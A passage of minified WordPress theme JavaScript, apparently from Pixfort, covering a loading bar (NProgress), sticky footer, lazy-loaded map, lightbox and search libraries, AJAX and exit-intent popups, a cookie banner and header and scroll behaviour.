translateY(0px)"})},{passive:!0})})}}(jQuery),function(t){t.fn.pixfooter=function(){if(!t("body").hasClass("pix-is-sticky-footer"))return!1;var e="bg-gradient-primary",i="";0==t(".pix-footer-overlay").length&&(t(".site-footer2:first").data("sticky-bg")&&("custom"==(e=t(".site-footer2:first").data("sticky-bg"))&&t(".site-footer2:first").data("sticky-color")&&(i='style="background:'+t(".site-footer2:first").data("sticky-color")+';"'),e="bg-"+e),t("#page").append('<div class="pix-footer-overlay '+e+'" '+i+"></div>"));var n=t("#page").outerHeight(),o=t(".pix-sticky-footer").outerHeight();t(".pix-footer-sticky-placeholder").height(o);var a=t("body").css("padding");a&&""!=a&&"0px"!=a&&t(".pix-sticky-footer, .pix-footer-overlay").css("bottom",a),setTimeout(function(){n=t("#page").height(),o=t(".pix-sticky-footer").outerHeight(),n-=o,t(".pix-footer-sticky-placeholder").height(o)},2e3),t(window).on("resize",function(){n=t("#page").height(),o=t(".pix-sticky-footer").outerHeight(),n-=o,t(".pix-footer-sticky-placeholder").height(o)}),setTimeout(function(){n=t("#page").height(),o=t(".pix-sticky-footer").outerHeight(),n-=o,t(".pix-footer-sticky-placeholder").height(o)},6e3),setTimeout(function(){n=t("#page").height(),o=t(".pix-sticky-footer").outerHeight(),n-=o,t(".pix-footer-sticky-placeholder").height(o)},12e3),t(".pix-footer-overlay").css("height",o),t("body").hasClass("pix-sections-stack")&&t(".pix-footer-overlay").css({"z-index":11});t(".site-content");t(".site-content").length>0&&t(".pix-portfolio-site-content");t(".pix-sticky-footer");let s=t(window).scrollTop();if(s+t(window).height()>n){var r=1-(s+t(window).height()-n)/o;r<0&&(r=0),r>1&&(r=1),r*=1.2,t(".pix-footer-overlay").css("opacity",r)}t(window).scroll(function(){let e=t(window).scrollTop();if(e+t(window).height()>n){t(".pix-sticky-footer").css("opacity",1);var i=1-(e+t(window).height()-n)/o;i<0&&(i=0),(i*=1.2)>1&&(i=1),t(".pix-footer-overlay").css("opacity",i)}else t(".pix-footer-overlay, .pix-sticky-footer").css("opacity",0)})}}(jQuery),function(t,e){"function"==typeof define&&define.amd?define(e):"object"==typeof exports?module.exports=e():t.NProgress=e()}(this,function(){var t,e,i={version:"0.2.0"},n=i.settings={minimum:.08,easing:"ease",positionUsing:"",speed:200,trickle:!0,trickleRate:.02,trickleSpeed:800,showSpinner:!0,barSelector:'[role="bar"]',spinnerSelector:'[role="spinner"]',parent:"body",template:'<div class="bar" role="bar"><div class="peg"></div></div><div class="spinner" role="spinner"><div class="spinner-icon"></div></div>'};function o(t,e,i){return t<e?e:t>i?i:t}function a(t){return 100*(-1+t)}i.configure=function(t){var e,i;for(e in t)void 0!==(i=t[e])&&t.hasOwnProperty(e)&&(n[e]=i);return this},i.status=null,i.set=function(t){var e=i.isStarted();t=o(t,n.minimum,1),i.status=1===t?null:t;var l=i.render(!e),d=l.querySelector(n.barSelector),c=n.speed,p=n.easing;return l.offsetWidth,s(function(e){""===n.positionUsing&&(n.positionUsing=i.getPositioningCSS()),r(d,function(t,e,i){var o;o="translate3d"===n.positionUsing?{transform:"translate3d("+a(t)+"%,0,0)"}:"translate"===n.positionUsing?{transform:"translate("+a(t)+"%,0)"}:{"margin-left":a(t)+"%"};return o.transition="all "+e+"ms "+i,o}(t,c,p)),1===t?(r(l,{transition:"none",opacity:1}),l.offsetWidth,setTimeout(function(){r(l,{transition:"all "+c+"ms linear",opacity:0}),setTimeout(function(){i.remove(),e()},c)},c)):setTimeout(e,c)}),this},i.isStarted=function(){return"number"==typeof i.status},i.start=function(){i.status||i.set(0);var t=function(){setTimeout(function(){i.status&&(i.trickle(),t())},n.trickleSpeed)};return n.trickle&&t(),this},i.done=function(t){return t||i.status?i.inc(.3+.5*Math.random()).set(1):this},i.inc=function(t){var e=i.status;return e?("number"!=typeof t&&(t=(1-e)*o(Math.random()*e,.1,.95)),e=o(e+t,0,.994),i.set(e)):i.start()},i.trickle=function(){return i.inc(Math.random()*n.trickleRate)},t=0,e=0,i.promise=function(n){return n&&"resolved"!==n.state()?(0===e&&i.start(),t++,e++,n.always(function(){0==--e?(t=0,i.done()):i.set((t-e)/t)}),this):this},i.render=function(t){if(i.isRendered())return document.getElementById("nprogress");d(document.documentElement,"nprogress-busy");var e=document.createElement("div");e.id="nprogress",e.innerHTML=n.template;var o,s=e.querySelector(n.barSelector),l=t?"-100":a(i.status||0),c=document.querySelector(n.parent);return r(s,{transition:"all 0 linear",transform:"translate3d("+l+"%,0,0)"}),n.showSpinner||(o=e.querySelector(n.spinnerSelector))&&u(o),c!=document.body&&d(c,"nprogress-custom-parent"),c.appendChild(e),e},i.remove=function(){c(document.documentElement,"nprogress-busy"),c(document.querySelector(n.parent),"nprogress-custom-parent");var t=document.getElementById("nprogress");t&&u(t)},i.isRendered=function(){return!!document.getElementById("nprogress")},i.getPositioningCSS=function(){var t=document.body.style,e="WebkitTransform"in t?"Webkit":"MozTransform"in t?"Moz":"msTransform"in t?"ms":"OTransform"in t?"O":"";return e+"Perspective"in t?"translate3d":e+"Transform"in t?"translate":"margin"};var s=function(){var t=[];function e(){var i=t.shift();i&&i(e)}return function(i){t.push(i),1==t.length&&e()}}(),r=function(){var t=["Webkit","O","Moz","ms"],e={};function i(i){return i=i.replace(/^-ms-/,"ms-").replace(/-([\da-z])/gi,function(t,e){return e.toUpperCase()}),e[i]||(e[i]=function(e){var i=document.body.style;if(e in i)return e;for(var n,o=t.length,a=e.charAt(0).toUpperCase()+e.slice(1);o--;)if((n=t[o]+a)in i)return n;return e}(i))}function n(t,e,n){e=i(e),t.style[e]=n}return function(t,e){var i,o,a=arguments;if(2==a.length)for(i in e)void 0!==(o=e[i])&&e.hasOwnProperty(i)&&n(t,i,o);else n(t,a[1],a[2])}}();function l(t,e){return("string"==typeof t?t:p(t)).indexOf(" "+e+" ")>=0}function d(t,e){var i=p(t),n=i+e;l(i,e)||(t.className=n.substring(1))}function c(t,e){var i,n=p(t);l(t,e)&&(i=n.replace(" "+e+" "," "),t.className=i.substring(1,i.length-1))}function p(t){return(" "+(t.className||"")+" ").replace(/\s+/gi," ")}function u(t){t&&t.parentNode&&t.parentNode.removeChild(t)}return i}),function(t){"use strict";jQuery.cachedScript=function(e,i){return i=t.extend(i||{},{dataType:"script",cache:!0,url:e}),jQuery.ajax(i)};let e=!1,i=!1;window.pixLoadMaps=function(){t(".pix-google-map").length>0&&(i?init_pix_maps():e||pixfort_main_object.hasOwnProperty("googleMapsUrl")&&(e=!0,t.cachedScript(pixfort_main_object.googleMapsUrl).done(function(n,o){i=!0,pixfort_main_object.hasOwnProperty("googleMapsScript")&&t.cachedScript(pixfort_main_object.googleMapsScript).done(function(t,i){init_pix_maps(),e=!1}).fail(function(t,e,i){console.log("Script was not loaded!")})}).fail(function(t,e,i){console.log("Library was not loaded!")})))}}(jQuery),function(t){"use strict";let e=!1,i=!1;jQuery(document).ready(function(t){pixLoadLightbox()}),window.pixLoadLightbox=function(){t(".pix-lightbox").length>0&&(i||(console.log("Lightbox Ready to load"),e||pixfort_main_object.hasOwnProperty("lightboxUrl")&&(e=!0,t.cachedScript(pixfort_main_object.lightboxUrl).done(function(t,e){i=!0}).fail(function(t,e,i){console.log("Lightbox Library was not loaded!")}))))}}(jQuery),function(t){"use strict";let e=!1,i=!1;window.pixLoadIsotope=function(n=!1){i?setTimeout(n,0):(console.log("Loading Isotope..."),function(n=!1){pixfort_main_object.hasOwnProperty("isotopeUrl")&&(e=!0,t.cachedScript(pixfort_main_object.isotopeUrl).done(function(t,e){i=!0,n&&setTimeout(n,0)}).fail(function(t,e,i){console.log("Isotope Library was not loaded!")}))}(n))}}(jQuery),function(t){"use strict";let e=!1,i=!1;jQuery(document).ready(function(t){let e=!1;function i(){t(".pix-ajax-search").each(function(e,i){var n=t(i).closest(".pix-ajax-search-container"),o=t(i).closest(".pix-search-form"),a=t(this).data("search-link");let s="";t(i).autoComplete({autoSelect:!1,noResultsText:"",resolver:"custom",formatResult:function(e){return e.icon?{value:e.id,text:e.text,html:[t("<img>").attr("src",e.icon)," ",e.text]}:{value:e.id,text:e.text,html:[e.text]}},events:{search:function(e,n){s!=t(i).val()&&(s=t(i).val(),t.get(a,{term:t(i).val()},function(t){if(!t.error){var e=JSON.parse(t);n(e)}}))}}});let r=!0;t(i).on("autocomplete.select",function(t,e){return t.preventDefault(),t.stopPropagation(),r=!1,e.value&&(window.location.href=e.value),!1}),n.submit(function(t){r||t.preventDefault()}),o.submit(function(t){r||t.preventDefault()}),t(i).on("autocomplete.freevalue",function(t,e){r=!0})})}t(".pix-ajax-search").hover(function(){e||pixLoadSearch(function(){i(),e=!0})}),t(".pix-ajax-search").focus(function(){e||pixLoadSearch(function(){i(),e=!0})})}),window.pixLoadSearch=function(n){i?setTimeout(n,0):e||function(n=!1){pixfort_main_object.hasOwnProperty("searchUrl")&&(e=!0,t.cachedScript(pixfort_main_object.searchUrl).done(function(t,e){i=!0,n&&setTimeout(n,0)}).fail(function(t,e,i){console.log("Search Library was not loaded!")}))}(n)}}(jQuery),function(t){"use strict";let i=992;function n(){t(".pix-scene").each(function(e,i){0==t(i).find(".pix-scene-elm-res:not(.pix-particle-sm-hide)").length?t(i).css("display","none"):t(i).css("display","block")})}async function o(){t(".pix-intro-1 .pix-intro-img img").each(function(e,i){var n=this;new Waypoint({element:i,offset:"100%",triggerOnce:!0,handler:function(){setTimeout(function(){t(n).addClass("animated")},10),setTimeout(function(){t(n).addClass("slow-transition")},1e3)}})})}"undefined"==typeof pixfort_main_object&&(window.pixfort_main_object={}),pixfort_main_object.hasOwnProperty("dataBreakpoint")&&(i=pixfort_main_object.dataBreakpoint),NProgress.configure({minimum:.01,speed:800,trickleSpeed:800,showSpinner:!0,parent:"body",template:'<div class="bar" role="bar"><div class="peg"></div></div>'}),t("body").hasClass("pix-disable-loading-bar")||0!=t(".pix-post-area").length||NProgress.start(),jQuery(document).ready(function(t){var n;function a(e,i){var n,o,a;Object.keys(i).forEach(e=>{t("#"+e+"-css").length||(console.log(e,i[e]),n=i[e].handle,o=i[e].src,a=t("<link>"),t("head").append(a),a.attr({rel:"stylesheet",type:"text/css",href:o,id:n+"-css"}))}),Object.keys(e).forEach(i=>{t("#"+i+"-js").length||(console.log(i,e[i]),e[i].extra&&e[i].extra.data&&t("<script>").attr("type","text/javascript").attr("id",e[i].handle+"-extra").text(e[i].extra.data).appendTo("head"),t.cachedScript(e[i].src))})}function s(e){t.alert({title:"",columnClass:"",backgroundDismiss:!0,buttons:!1,theme:"pix-main-popup",content:"<div></div>",onOpenBefore:function(){this.setColumnClass("col-2 pix-popup-edit"),this.showLoading(!0)},onContentReady:function(){var i=this;return t.ajax({url:e,method:"get"}).done(function(e){var n=!1;try{n=JSON.parse(e)}catch(t){return!1}if(n&&n.html){let e=n.size+" pix-popup-edit pix-popup-ready";i.setColumnClass(e),i.setContentAppend('<div class="pix-popup-content-div">'+n.html+"</div>"),i.hideLoading(!0),setTimeout(function(){i.$body.addClass("pix-popup-animate"),t(".pix-intro-img img").addClass("animated"),t("body").trigger("pix_popup_open"),pix_animation(i.$body,!0),piximations.init(),pix_init_c7(),pixLoadImgs(),pixLoadMaps(),pix_countdown(),i.$body.find('[data-toggle="tooltip"]').length&&i.$body.find('[data-toggle="tooltip"]').tooltip(),t('[data-toggle="tooltip"]').length&&t('[data-toggle="tooltip"]').tooltip()},200),setTimeout(function(){i.$body.find(".elementor-invisible").removeClass("elementor-invisible"),"undefined"!=typeof elementorFrontend&&null!==elementorFrontend&&elementorFrontend&&(elementorFrontend.hooks.addAction("init",function(){pix_animation(!1,!0)}),i.$body.find(".elementor-element").each(function(){elementorFrontend.elementsHandler.runReadyTrigger(jQuery(this))}),pix_animation(!1,!0),pix_animation(i.$body,!0)),"function"==typeof i.$body.find(".quform-form").quform&&(i.$body.find(".quform-form").quform(),i.$body.find(".quform-recaptcha").length&&window.QuformRecaptchaLoaded&&window.QuformRecaptchaLoaded())},300),setTimeout(function(){pix_animation_display(i.$body),n.footer_content&&i.setContentAppend('<div class="pix-popup-footer-div">'+n.footer_content+"</div>"),n.result&&n.result.scripts&&n.result.styles&&a(n.result.scripts,n.result.styles)},1e3),i.$body.find(".wpcf7 > form").each(function(){var e=t(this);void 0!=wpcf7.initForm?(wpcf7.initForm(e),wpcf7.cached&&wpcf7.refill(e)):wpcf7.init(t(this)[0])}),i.$body.find(".pix-close-popup").on("click",function(t){t.preventDefault(),i.close()}),i.$body.find(".pix_tabs_btns").each(function(e,i){t(i).find(".nav-item:first a").tab("show")}),i.$body.find(".pix-shape-dividers").each(function(){if(!t(this).hasClass("loaded")){new dividerShapes(this).initPoints(),t(this).addClass("loaded")}})}}).fail(function(){i.setContent("Something went wrong, please try again.")})}})}t(window).on("click",function(t){return n=t.target,!0}),t(window).on("beforeunload",function(e){e=e||window.event;let i=!0;if(n)if(n.href&&"undefined"!=n.href)(n.href.startsWith("tel")||n.href.startsWith("mailto"))&&(i=!1);else{let e=t(n).closest("a");e&&void 0!=e.href&&(e.href.startsWith("tel")||e.href.startsWith("mailto"))&&(i=!1)}i?document.body.classList.remove("render"):document.body.classList.add("render")}),setTimeout(()=>document.body.classList.add("render"),0),setTimeout(()=>document.body.classList.add("pix-body-loaded"),0),window.pixOpenPopup=function(t){if(pixfort_main_object.hasOwnProperty("dataPopupBase")){s(pixfort_main_object.dataPopupBase+"&id="+t)}},pixfort_main_object.hasOwnProperty("dataBodyBg")&&t("body").css({"background-color":pixfort_main_object.dataBodyBg}),pixfort_main_object.hasOwnProperty("dataExitPopup")&&setTimeout(function(){var e=pixfort_main_object.dataExitPopup,i=pixfort_main_object.dataPopupCheckLink,n=!1;i&&(i+="&exitpopup=true",t.ajax({url:i,method:"get"}).done(function(t){try{var i=JSON.parse(t);i&&i.result&&e&&""!=e&&(o=document,a="mouseout",r=function(t){if(!n){var i=(t=t||window.event).relatedTarget||t.toElement;i&&"HTML"!=i.nodeName||(n=!0,s(e))}},o.addEventListener?o.addEventListener(a,r,!1):o.attachEvent&&o.attachEvent("on"+a,r))}catch(t){return!1}var o,a,r}))},0),pixfort_main_object.hasOwnProperty("dataAutoPopup")&&setTimeout(function(){var e=pixfort_main_object.dataAutoPopup,i=pixfort_main_object.dataPopupCheckLink,n=1e3;pixfort_main_object.hasOwnProperty("dataAutoPopupTime")&&(n=pixfort_main_object.dataAutoPopupTime),n&&!isNaN(n)?n*=1e3:n=5e3,i&&(i+="&autopopup=true",t.ajax({url:i,method:"get"}).done(function(t){try{var i=JSON.parse(t);i&&i.result&&e&&""!=e&&setTimeout(function(){s(e)},n)}catch(t){return!1}}))},0),t(".pix-cookie-banner").length&&setTimeout(function(){if(pixfort_main_object.hasOwnProperty("datacookiesId")){let e=localStorage.getItem("pix_cookiesbanner");e&&e==pixfort_main_object.datacookiesId&&(t(".pix-cookie-banner").addClass("pix-closed"),setTimeout(function(){t(".pix-cookie-banner").remove()},2500))}else{var e=pixfort_main_object.dataPopupCheckLink;e&&(e+="&cookiesbanner=true",t.ajax({url:e,method:"get"}).done(function(e){try{var i=JSON.parse(e);i&&!1===i.result&&(setTimeout(function(){t(".pix-cookie-banner").addClass("pix-closed")},2e3),setTimeout(function(){t(".pix-cookie-banner").remove()},2500))}catch(t){return!1}}))}},0),t("body").on("click",".flickity-slider, .flickity-button",function(t){pix_animation_display()}),t("body").on("click",".pix-popup-link",function(e){(e.preventDefault(),t(this).data("popup-link")&&""!=t(this).data("popup-link"))&&s(t(this).data("popup-link"));return!1}),t("body").on("click",".pix-story-popup",function(e){e.preventDefault();var i=t(this).data("stories");if(i&&""!=i){var n="";n+='<div class="firas2 pix-popup-content-div"><div class="pix-story-slider bg-black pix-slider-story no-dots2">',t.each(i,function(t,e){n+='<div class="carousel-cell p-0">',n+='<img class="jarallax-img pix-fit-cover w-100 pix-opacity-8" src="'+e+'" />',n+="</div>"}),n+="</div>",n+="</div>",t.alert({title:"",columnClass:"col-12 col-sm-6",backgroundDismiss:!0,buttons:!1,theme:"pix-video-popup",content:n,onOpenBefore:function(){this.showLoading(!0)},onContentReady:function(){let e=this;t(".pix-story-slider").length>0&&t(".pix-story-slider").flickity({draggable:!0,adaptiveHeight:!0,wrapAround:!0,autoPlay:3500,prevNextButtons:!1,imagesLoaded:!0,contain:!0,resize:!0,ready:function(){t(".pix-story-slider").flickity("resize")},on:{ready:function(){t(this).closest(".pix-story-slider").show(),t(this).closest(".pix-story-slider").removeClass("d-in"),t(this).removeClass("d-in"),setTimeout(function(){e.$body.addClass("pix-popup-animate")},400),setTimeout(function(){e.hideLoading(!0)},600)}}})}})}return!1}),t("body").on("click",".pix-video-popup",function(e){if(e.preventDefault(),t(this).data("content")&&""!=t(this).data("content")){var i=t(this).data("content"),n="embed-responsive-21by9";t(this).data("aspect")&&""!=t(this).data("aspect")&&(n=t(this).data("aspect"));var o="";o+='<div class="pix-video video-active">',o+='<div class="embed-responsive '+n+'">',o+=i,o+="</div>",o+="</div>",t.alert({title:"",columnClass:"col-12",backgroundDismiss:!0,buttons:!1,theme:"pix-video-popup",content:o,onContentReady:function(){this.$content.find("iframe").each(function(e,i){let n=t(i).data("src");t(i).attr("src",n).click(),setTimeout(function(){t(i).click()},1e3)})}})}return!1}),t("body").on("click",".pix-audio-popup",function(e){if(e.preventDefault(),t(this).data("content")&&""!=t(this).data("content")){var i=t(this).data("content");t(this).data("aspect")&&""!=t(this).data("aspect")&&t(this).data("aspect");var n="";n+=i,t.alert({title:"",columnClass:"col-12",backgroundDismiss:!0,buttons:!1,theme:"pix-audio-popup",content:n,onContentReady:function(){this.$content.find("iframe").each(function(e,i){let n=t(i).data("src");t(i).attr("src",n).click(),setTimeout(function(){t(i).click()},1e3)})}})}return!1}),t("body").on("click",".pix-search-toggle",function(e){e.preventDefault();let n=t(this);if(n.closest(".pix-search-sm-btn").toggleClass("is-opened"),n.closest(".pix-search-sm-btn").hasClass("is-opened")&&setTimeout(function(){n.closest(".pix-search-sm-btn").find("input.pix-ajax-search").focus()},300),window.innerWidth<i){t(this).closest(".navbar").css({overflow:"visible"}),t(this).closest("header.pix-header-mobile").css({overflow:"visible"});t(this).closest(".pix-search-sm-btn").width();let e=t(this).offset().left;e-=10,e*=-1,t(this).closest(".pix-search-sm-btn").find(".pix-header-floating-search").css({left:e,right:"auto"})}return!1});let r,l,d,c,p,u,h=!1;t(".pix-header-transparent-parent").length?r=t(".pix-header-transparent-parent"):t(".pix-header-boxed").length?r=t(".pix-header-boxed"):(t(".pix-topbar.pix-header-desktop").length&&(l=t(".pix-topbar.pix-header-desktop")),t(".pix-header.pix-header-desktop").length&&(d=t(".pix-header.pix-header-desktop")),t(".pix-header-stack.pix-header-desktop").length&&(c=t(".pix-header-stack.pix-header-desktop"))),t(".pix-topbar.pix-header-mobile").length&&(p=t(".pix-topbar.pix-header-mobile")),t(".pix-header.pix-header-mobile").length&&(u=t(".pix-header.pix-header-mobile")),t(".pix-stack-mobile").length&&(h=t(".pix-stack-mobile"));let f="desktop";window.innerWidth>=i?(p&&p.remove(),u&&u.remove(),h&&h.remove()):(f="mobile",r&&r.remove(),l&&l.remove(),d&&d.remove(),c&&c.remove()),t(window).resize(function(){window.innerWidth>=i?"mobile"===f&&(f="desktop",p&&p.remove(),u&&u.remove(),h&&h.remove(),r&&t("#page").prepend(r),c&&t("#page").prepend(c),d&&t("#page").prepend(d),l&&t("#page").prepend(l),pix_animation(!1,!0)):"desktop"===f&&(f="mobile",r&&r.remove(),l&&l.remove(),d&&d.remove(),c&&c.remove(),h&&t("#page").prepend(h),u&&t("#page").prepend(u),p&&t("#page").prepend(p),pix_animation(!1,!0))}),t("body").on("click",".hamburger.small-menu-toggle",function(e){"true"===t(this).attr("aria-expanded")?t(this).removeClass("is-active"):t(this).addClass("is-active")}),t("body").on("click",".hamburger.normal-menu-toggle",function(e){e.preventDefault(),t(this).hasClass("is-active")?(t(this).removeClass("is-active"),t(this).closest(".navbar-nav").find("li").removeClass("is-shown")):(t(this).addClass("is-active"),t(this).closest(".navbar-nav").find("li").addClass("is-shown"))}),t("body").on("click",".pix-tabs-btn",function(e){var i=t(this).closest(".pix_tabs_container");i.find(".pix-main-slider").each(function(e,i){t(i).addClass("pix-tabs-slider"),t(i).removeClass("pix-slider-loaded")}),init_portfolio(t(this).closest(".pix_tabs_container")),setTimeout(function(){init_fancy_mockup(i),pix_main_slider(i)},500)}),t("p:empty").each(function(e,i){t(i).attr("class")&&""!==t(i).attr("class")||void 0===t(i).attr("role")&&t(i).remove()}),t(".animate-in, .pix-main-slider, .pix-fancy-mockup, .feature_img").closest(".elementor-invisible").removeClass("elementor-invisible"),t(".particles-wrapper2").closest(".vc_column_container").css("z-index","3"),t(".entry-content2 > section, .elementor-section-wrap > section").each(function(e,i){t(i).find(".sticky-top").length||(t(i).find(".pix-slider").length||t(i).find(".pix-scale-in-sm").length||t(i).find(".pix-scale-in").length||t(i).find(".pix-scale-in-lg").length)&&t(i).removeClass("vc_section_visible vc_row_visible").addClass("overflow-hidden")}),t("body").on("click",".dropdown-item.dropdown-toggle",function(e){t(this).closest(".menu-item.dropdown.nav-item").find("> .dropdown-menu").toggleClass("show"),e.stopPropagation(),e.preventDefault()}),/^((?!chrome|android).)*safari/i.test(navigator.userAgent)&&(t("body").addClass("pix-is-safari"),t(".pix-slider-full").closest("section:not(.overflow-visible)").removeClass("vc_section_visible").addClass("overflow-hidden"),t(".pix-slider-full").closest(".vc_row:not(.overflow-visible)").removeClass("vc_row_visible").addClass("overflow-hidden"),t(".pix-scene").each(function(e,i){t(i).closest("section:not(.overflow-visible)").removeClass("vc_section_visible").addClass("overflow-hidden")})),t(".pix-small-search").closest(".vc_row").css({"z-index":50}),t(".pix_element_overlay").each(function(e,i){t(i).css({"border-radius":t(i).parent().css("border-radius")})}),setTimeout(function(){t(".bg-video").each(function(e,i){t(i).controls=!1,i.controls=!1})},1e3),t(".pix-post-area").length>0&&NProgress.configure({minimum:1e-4,trickleRate:.02,easing:!1,trickleSpeed:800,showSpinner:!1,parent:"body",template:'<div class="bar" role="bar"><div class="peg"></div></div>'});var m=0,y=0;t(".pix-post-area").length>0&&(m=t("#pix-entry-content").offset().top,y=t("#pix-entry-content").height());var g=!1;t(".site-footer2:not(.pix-sticky-footer)").length&&(g=t(".site-footer2:not(.pix-sticky-footer)")[0]);var v=t(window).height();document.addEventListener("scroll",e=>{if(document.body.scrollTop>20||document.documentElement.scrollTop>20?t(".back_to_top").addClass("active"):t(".back_to_top").removeClass("active"),t(".pix-post-area").length>0)if(document.documentElement.scrollTop>m){let t=0;document.documentElement.scrollTop>m+y?(t=.999,NProgress.set(t)):(t=(document.documentElement.scrollTop-m)/y,NProgress.set(t))}else NProgress.set(.001);g&&(g.getBoundingClientRect().top<v&&pix_animation_display(t(".site-footer2:not(.pix-sticky-footer)")))},{passive:!0});t(".back_to_top").on("click",function(e){return e.preventDefault(),t("body,html").animate({scrollTop:0},700),!1});let b=0;function x(){!function(){try{document.createEvent("TouchEvent")}catch(t){return!1}}();t(".pix-nav-link.dropdown-toggle.nav-link").unbind("click"),t(".pix-nav-link.dropdown-toggle.nav-link, .menu-item.menu-item-has-children.dropdown.nav-item a").on("click",function(e){if(t(this).attr("href")){let n=t(this).attr("href"),o=t(this).attr("target");if(n&&!n.startsWith("#")&&-1==n.indexOf("#pix_section"))if(!t(this).hasClass("pix-item-clicked")&&window.innerWidth<i)t(".pix-item-clicked").removeClass("pix-item-clicked"),t(this).addClass("pix-item-clicked");else{if("_blank"==o)return e.preventDefault(),e.stopPropagation(),window.open(n),!1;window.location=n}}})}t("#masthead").length&&(b=t("#masthead").height()),t("#wpadminbar").length&&(b+=t("#wpadminbar").height()),t("body").on("click","a",function(i){let n=this;var o=t(this).attr("href");let a=t(this).attr("target");if("undefined"!==o&&void 0!=o)if(o&&o.startsWith("#pix_section")){if(t(o).length)return i.preventDefault(),t("body,html").animate({scrollTop:t(o).offset().top-b},700),setTimeout(function(){t(n).closest(".navbar").find(".navbar-toggler.hamburger").click()},200),!1}else if(-1!=o.indexOf("#pix_section")){let s=o.substr(o.indexOf("#"));if(t(s).length)return i.preventDefault(),t("body,html").animate({scrollTop:t(s).offset().top-b},700),setTimeout(function(){t(n).closest(".navbar").find(".navbar-toggler.hamburger").click()},200),!1;if("_blank"==a)return e.preventDefault(),e.stopPropagation(),window.open(o),!1;window.location=o}else{if(o&&o.startsWith("#pix_popup_")){i.preventDefault();let t=o.replace("#pix_popup_","");return t&&pixOpenPopup(t),!1}if(o&&o.startsWith("#pix-product-")){if(t(o).length)return i.stopPropagation(),i.preventDefault(),t("body,html").animate({scrollTop:t(o).offset().top-b-20},700),!1}else if(o&&o.startsWith("#pix-tab-")&&!t(this).hasClass("pix-tabs-btn")){if(t(o).length){i.stopPropagation(),i.preventDefault();let e=o.replace("#","");return t('.pix-tabs-btn[aria-controls="'+e+'"]').click(),setTimeout(function(){t("body,html").animate({scrollTop:t(o).offset().top-b-20},700)},200),!1}}else if(o&&-1!=o.indexOf("#pix-tab-")&&!t(this).hasClass("pix-tabs-btn")){let e=o.substr(o.indexOf("#pix-tab-")),i=e.replace("#","");t('.pix-tabs-btn[aria-controls="'+i+'"]').click(),t(e).length&&setTimeout(function(){t("body,html").animate({scrollTop:t(e).offset().top-b-20},700)},200)}}}),x(),window.addEventListener("resize",x);var w=location.hash.substr(1);w&&(w.startsWith("pix_section")?t("#"+w).length&&setTimeout(function(){t("body,html").animate({scrollTop:t("#"+w).offset().top-b},700)},700):w.startsWith("pix-tab")&&t("#"+w).length&&setTimeout(function(){t('.pix-tabs-btn[aria-controls="'+w+'"]').click(),setTimeout(function(){t("body,html").animate({scrollTop:t("#"+w).offset().top-b-20},700)},200)},500)),setTimeout(function(){t(".pix-intro-img").addClass("pix-loaded")},2e3),t('[data-toggle="tooltip"]').length&&t('[data-toggle="tooltip"]').tooltip(),t(".pixfort-select").selectpicker({styleBase:"btn dropdown-toggle btn-light bg-white shadow-sm2 font-weight-bold text-body-default text-sm"}),t(".widget:not(.widget_categories) select, .wp-block-archives.wp-block-archives-dropdown select, .wp-block-categories.wp-block-categories-dropdown select").selectpicker({styleBase:"pix-widget-select pix-mb-15 btn dropdown-toggle btn-light bg-white shadow-sm2 font-weight-bold text-body-default text-sm"}),t(".widget.widget_categories select").selectpicker({styleBase:"pix-widget-select pix-mb-15 btn dropdown-toggle btn-light bg-white shadow-sm2 font-weight-bold text-body-default text-sm",container:"body"}),t(".widget.widget_categories select").on("changed.bs.select",function(e,i,n,o){return e.preventDefault(),t(this).closest("form").submit(),e.stopPropagation(),!1}),t("body").on("click",".video-play-btn-inline",function(e){e.preventDefault();var i=t(this),n=i.closest(".pix-video").find("iframe");return n.attr("data-src")&&n.attr("src",n.attr("data-src")).click(),i.closest(".pix-video").find("video").trigger("play"),i.parent(".pix-video").addClass("video-active"),setTimeout(function(){i.parent(".pix-video").addClass("video-start")},400),!1});if(t("#masthead").length&&t("#masthead").offset().top,t("#masthead").hasClass("pix-mt-20")&&20,t(".pix-header-transparent").length>0){var C=t(".pix-header-transparent > div").height();t(".pix-main-intro-placeholder").addClass("d-block w-100").height(C)}if(t(".pix-header-boxed").length>0){C=t(".pix-header-boxed > div").height();t(".pix-main-intro-placeholder").addClass("d-block w-100").height(C)}if(t(".pix-header").length>0){let e=t(".pix-header").height()+20;t("#wpadminbar").length>0&&(e+=t("#wpadminbar").height()),t("#masthead").length>0&&t("#masthead").hasClass("pix-header-box")&&(e+=20),t(".pix-sticky-top-adjust").css({top:e})}var k=!1;if(t(".pix-floating-meta").length){if(t(window).width()>1300){k=!0;var _=t(".post").offset().top;if(t(".pix-floating-meta").addClass("position-fixed sticky-top2").css({top:_,width:"70px","margin-left":"-90px"}),t(".post").hasClass("post-sidebar-left")){var j=t(".post:first-of-type").offset().left+t(".post:first-of-type").width()+20;t(".pix-floating-meta").addClass("position-fixed sticky-top2").css({left:j,"margin-left":"0px"})}var P=20;t("#masthead").length&&(P+=t("#masthead").height()),t("#wpadminbar").length&&(P+=t("#wpadminbar").height());var T=t(".post").offset().top+t(".post").height()}}else k=!1;t(".pix-floating-meta").length&&t(window).resize(function(){if(t(window).width()<1300)k=!1,t(".pix-floating-meta").removeClass("position-fixed sticky-top2").css({top:"auto",width:"auto","margin-left":"0px"});else if(k=!0,t(".post").length){var e=t(".post").offset().top;if(t(".pix-floating-meta").addClass("position-fixed sticky-top2").css({top:e,width:"70px","margin-left":"-90px"}),t(".post").hasClass("post-sidebar-left")){var i=t(".post:first-of-type").offset().left+t(".post:first-of-type").width()+20;t(".pix-floating-meta").addClass("position-fixed sticky-top2").css({left:i,"margin-left":"0px"})}t("#masthead").length&&t("#masthead").height(),t("#wpadminbar").length&&t("#wpadminbar").height();t(".post").offset().top,t(".post").height()}});let S=0,$=0;t("body").hasClass("pix-padding-style")&&(S=t("body").css("padding-left"),$=t("body").css("padding-bottom"),S&&""!=S&&"0"!=S&&"0px"!=S?(t(".vc_row-fluid").css({"padding-left":S,"padding-right":S}),t(".back_to_top").css({"margin-left":S,"margin-right":S}),$&&t(".back_to_top").css({"margin-bottom":$})):S=0);var A=50,E="",O="";t("#page").length&&(A=t("#page").offset().top,t(".pix-topbar").length&&(A+=t(".pix-topbar").height())),0===A&&(A=6),t("#masthead").length&&(t("#masthead").hasClass("pix-mt-20")&&(A+=20),t("#masthead").data("text-scroll")&&""!=t("#masthead").data("text-scroll")&&(E="text-"+t("#masthead").data("text"),O="text-"+t("#masthead").data("text-scroll"))),t("#wpadminbar").length&&(A+=t("#wpadminbar").height());var 